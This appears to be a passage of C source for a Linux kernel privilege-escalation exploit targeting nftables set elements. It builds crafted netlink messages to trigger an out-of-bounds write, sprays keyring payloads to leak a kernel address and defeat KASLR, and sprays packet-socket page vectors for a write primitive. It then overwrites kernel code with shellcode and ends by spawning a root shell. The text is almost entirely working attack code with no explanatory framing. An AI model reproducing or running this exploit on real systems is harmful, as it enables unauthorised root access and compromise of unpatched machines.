iov[0].iov_base = (void *)nlh_batch_begin;
iov[0].iov_len = nlh_batch_begin->nlmsg_len;
iov[1].iov_base = (void *)nlh_payload;
iov[1].iov_len = nlh_payload->nlmsg_len;
iov[2].iov_base = (void *)nlh_batch_end;
iov[2].iov_len = nlh_batch_end->nlmsg_len;

// 4. Prepare the message to send
memset(&msg, 0, sizeof(struct msghdr));
msg.msg_name = (void *)&dest_snl;
msg.msg_namelen = sizeof(struct sockaddr_nl);
msg.msg_iov = iov;
msg.msg_iovlen = 3;

// Send message
sendmsg(sock, &msg, 0);

// Free allocated memory
free(nlh_batch_end);
free(nlh_payload);
free(nlh_batch_begin);
}

/* add_elem_to_set(): Trigger OOB
* @sock: Socket used to communicate throught the netfilter netlink
* @set_name: Name of the set to add the element
* @set_keylen: Length of the keys of the previous set
* @table_name: Table associated to the preiv
* @id: ID of the previous set
* @data_len: Length of the data to copy. (= Size of the overflow - 16 )
* @data: Data used for the overflow
*
* Submit two elements to add to the set.
* The first one is used to setup the data payload
* The second will trigger the overflow */
void add_elem_to_set(int sock, const char *set_name, uint32_t set_keylen, const char *table_name, uint32_t id, uint32_t data_len, uint8_t *data) {
struct msghdr msg;
struct sockaddr_nl dest_snl;
struct nlmsghdr *nlh_batch_begin;
struct nlmsghdr *nlh_payload;
struct nlmsghdr *nlh_batch_end;
struct nfgenmsg *nfm;
struct nlattr *attr;
uint64_t nlh_payload_size;
uint64_t nested_attr_size;
size_t first_element_size;
size_t second_element_size;
struct iovec iov[3];

// Prepare the netlink sockaddr for msg
memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
dest_snl.nl_family = AF_NETLINK;

// 1. First netlink message: batch
nlh_batch_begin = get_batch_begin_nlmsg();

// 2. Second netlink message : Set attributes
// Precompute the size of the nested field
nested_attr_size = 0;

// First element
nested_attr_size += sizeof(struct nlattr); // Englobing attribute
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_KEY
nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_DATA
nested_attr_size += NLA_ALIGN(NLA_BIN_SIZE(data_len)); // NFTA_DATA_VALUE
first_element_size = nested_attr_size;

// Second element
nested_attr_size += sizeof(struct nlattr); // Englobing attribute
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_KEY
nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_DATA
nested_attr_size += sizeof(struct nlattr); // NFTA_DATA_VERDICT
nested_attr_size += U32_NLA_SIZE; // NFTA_VERDICT_CODE
second_element_size = nested_attr_size - first_element_size;

nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
nlh_payload_size += sizeof(struct nlattr); // NFTA_SET_ELEM_LIST_ELEMENTS
nlh_payload_size += nested_attr_size; // All the stuff described above
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_ELEM_LIST_TABLE
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_ELEM_LIST_SET
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_ELEM_LIST_SET_ID
nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

// Allocation
nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
if (!nlh_payload)
err_exit("malloc");
memset(nlh_payload, 0, nlh_payload_size);

// Fill the required fields
nlh_payload->nlmsg_len = nlh_payload_size;
nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM;
nlh_payload->nlmsg_pid = getpid();
nlh_payload->nlmsg_flags = NLM_F_REQUEST;
nlh_payload->nlmsg_seq = 0;

// Setup the nfgenmsg
nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
nfm->nfgen_family = NFPROTO_INET;

// Setup the attributes
attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_TABLE, table_name);
attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_SET, set_name);
attr = set_u32_attr(attr, NFTA_SET_ELEM_LIST_SET_ID, id);
attr = set_nested_attr(attr, NFTA_SET_ELEM_LIST_ELEMENTS, nested_attr_size);

// 2-1 First element
attr = set_nested_attr(attr, 0, first_element_size - 4);
attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, NLA_BIN_SIZE(data_len));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)data, data_len);

// 2-2 Second element
attr = set_nested_attr(attr, 0, second_element_size - 4);
attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, U32_NLA_SIZE + sizeof(struct nlattr));
attr = set_nested_attr(attr, NFTA_DATA_VERDICT, U32_NLA_SIZE);
set_u32_attr(attr, NFTA_VERDICT_CODE, NFT_CONTINUE);

// 3. Last netlink message: End of batch
nlh_batch_end = get_batch_end_nlmsg();

// Setup the iovec
memset(iov, 0, sizeof(struct iovec) * 3);
iov[0].iov_base = (void *)nlh_batch_begin;
iov[0].iov_len = nlh_batch_begin->nlmsg_len;
iov[1].iov_base = (void *)nlh_payload;
iov[1].iov_len = nlh_payload->nlmsg_len;
iov[2].iov_base = (void *)nlh_batch_end;
iov[2].iov_len = nlh_batch_end->nlmsg_len;

// Prepare the message to send
memset(&msg, 0, sizeof(struct msghdr));
msg.msg_name = (void *)&dest_snl;
msg.msg_namelen = sizeof(struct sockaddr_nl);
msg.msg_iov = iov;
msg.msg_iovlen = 3;

// Send message
sendmsg(sock, &msg, 0);

// Free allocated memory
free(nlh_batch_end);
free(nlh_payload);
free(nlh_batch_begin);
}

// ---------------------------------- util --------------------------------------
#define FILENAME_MAX_LEN 0x80

// write_file(): Write a string into a file
void write_file(const char *filename, char *text) {
int fd = open(filename, O_RDWR);
write(fd, text, strlen(text));
close(fd);
}

// new_ns(): Change the current namespace to access to netfilter and to be able to write security xattr in a tmpfs
void new_ns(void) {
uid_t uid = getuid();
gid_t gid = getgid();
char buffer[0x100];

if (unshare(CLONE_NEWUSER | CLONE_NEWNS))
err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS)");

if (unshare(CLONE_NEWNET))
err_exit("unshare(CLONE_NEWNET)");

write_file("/proc/self/setgroups", "deny");

snprintf(buffer, sizeof(buffer), "0 %d 1", uid);
write_file("/proc/self/uid_map", buffer);
snprintf(buffer, sizeof(buffer), "0 %d 1", gid);
write_file("/proc/self/gid_map", buffer);
}

// set_cpu_affinity(): Pin a process to a CPU
void set_cpu_affinity(int cpu_n, pid_t pid) {
cpu_set_t set;

CPU_ZERO(&set);
CPU_SET(cpu_n, &set);

if (sched_setaffinity(pid, sizeof(set), &set) < 0)
err_exit("sched_setaffinity");
}

int is_keyring_corrupted(key_serial_t *id_buffer, uint32_t id_buffer_size,
key_serial_t *corrupted_key_id) {
uint8_t buffer[CORRUPT_SIZE] = {0};
int32_t keylen;

for (uint32_t i = 0; i < id_buffer_size; i++) {
if (!id_buffer[i]) {
continue;
}

keylen = key_read(id_buffer[i], buffer, CORRUPT_SIZE);
if (keylen < 0)
err_exit("keyctl: %m");

if (keylen == CORRUPT_SIZE) {
*corrupted_key_id = id_buffer[i];
return 1;
}
}
return 0;
}

void key_revokes(key_serial_t *id_buffer, uint32_t id_buffer_size) {
for (uint32_t i = 0; i < id_buffer_size; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
}

int netfilter_sock = -1;
uint64_t leak_ptr;

void init_netfilter(void) {
struct sockaddr_nl snl;

puts("creating netfilter netlink socket");
if ((netfilter_sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER)) < 0) {
err_exit("can't create netfilter socket: %m");
}

memset(&snl, 0, sizeof(snl));
snl.nl_family = AF_NETLINK;
snl.nl_pid = getpid();
if (bind(netfilter_sock, (struct sockaddr *)&snl, sizeof(snl)) < 0) {
err_exit("bind: %m");
}

puts("register netfilter table");
create_table(netfilter_sock, TABLE_NAME);

puts("creating a netfilter set for the info leak");
create_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, sizeof(struct leak_payload), TABLE_NAME, ID);

puts("creating a netfilter set for the write primitive");
create_set(netfilter_sock, SET_NAME, KMALLOC64_KEYLEN, sizeof(struct write_payload), TABLE_NAME, ID + 1);
}

void init_namespace(void) {
int fd;
char buff[0x100];

uid_t uid = getuid();
gid_t gid = getgid();

if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
}

if (unshare(CLONE_NEWNET)) {
err_exit("unshare(CLONE_NEWNET): %m");
}

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", uid);
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", gid);
write(fd, buff, strlen(buff));
close(fd);
}

void do_init(void) {
set_cpu_affinity(0, 0);
init_namespace();
init_netfilter();
}

int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT);

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
printf("found keyring %d is corrupted!\n", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id, CORRUPT_SIZE, 0x4141414141414141); // proc_fs_context_ops
if (!leak_ptr) {
puts("leak rcu.func failed");
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}

#define KMALLOC64_PAGE_CNT ((32 + 8) / 8)

#define PACKET_FENGSHUI_CNT (0x100)
#define PACKET_SPRAY_CNT (0x100)
#define PACKET_FREE_HOLE_STEP (0x20)

int pagealloc_pad(int count, int size) {
return packet_socket_setup(size, 2048, count, 0, 100);
}

int do_write_primitive(void) {
int packet_fds[PACKET_SPRAY_CNT] = {0};
int fengshui_fds[PACKET_FENGSHUI_CNT] = {0};

struct write_payload payload;
memset(&payload, 0, sizeof(struct write_payload));
payload.pg_vec = (void *)(leak_ptr & ~0xfff);
payload.pg_vec2 = payload.pg_vec + PAGE_SIZE;

puts("use raw_packet to fill kmalloc-64 ...");
for (int i = 0; i < PACKET_FENGSHUI_CNT; i++) {
fengshui_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

puts("spraying pg_vec in kmalloc-64 ...");
memset(packet_fds, 0, sizeof(packet_fds));
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
packet_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

puts("free some pg_vec to create holes ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i += PACKET_FREE_HOLE_STEP) {
close(packet_fds[i]);
packet_fds[i] = 0;
}

puts("trigger oob write ...");

add_elem_to_set(netfilter_sock, SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct write_payload), (uint8_t *)&payload);

puts("searching edited page ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
if (!packet_fds[i]) {
continue;
}
// packet mmap to userland
char *page = (char *)mmap(NULL, PAGE_SIZE * KMALLOC64_PAGE_CNT,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds[i], 0);
if (!page || (ssize_t)page < 0) {
printf("mmap error: %p", page);
continue;
}
// search non-empty page
int j;
for (j = 0x30; j < 0x1000; j++) {
if (page[j] != 0) {
break;
}
}

// found non-empty page
if (j != 0x1000) {
puts("found target page!!");
uint64_t *pos = (uint64_t *)&page[leak_ptr & 0xfff];
uint8_t backup[sizeof(shellcode)] = {0};

puts("write shellcode");

memcpy(backup, pos, sizeof(backup));
memcpy(pos, shellcode, sizeof(shellcode));

// trigger rcu, trigger shellcode
key_serial_t fd = key_alloc("shellcode_trigger", "AAAA",4);
key_revoke(fd);
key_alloc("shellcode_trigger", "AAAA",4);

memcpy(pos, backup, sizeof(backup));
return 0;
}
}

puts("can't found target page");

for (int i = 0; i < PACKET_FENGSHUI_CNT; i++) {
close(fengshui_fds[i]);
}
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
close(packet_fds[i]);
}

return 1;
}

int main(int argc, char **argv) {
puts("initialize exploit environment ...");
do_init();

while (do_leak()) {
usleep(100 * 1000);
puts("retry ...");
}

kernel_offset = leak_ptr - 0xffffffff81532fb0;
kernel_base = 0xffffffff81000000 + kernel_offset;
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

while (do_write_primitive()) {
usleep(100 * 1000);
puts("retry ...");
}

execl("/bin/sh", "sh", NULL);
}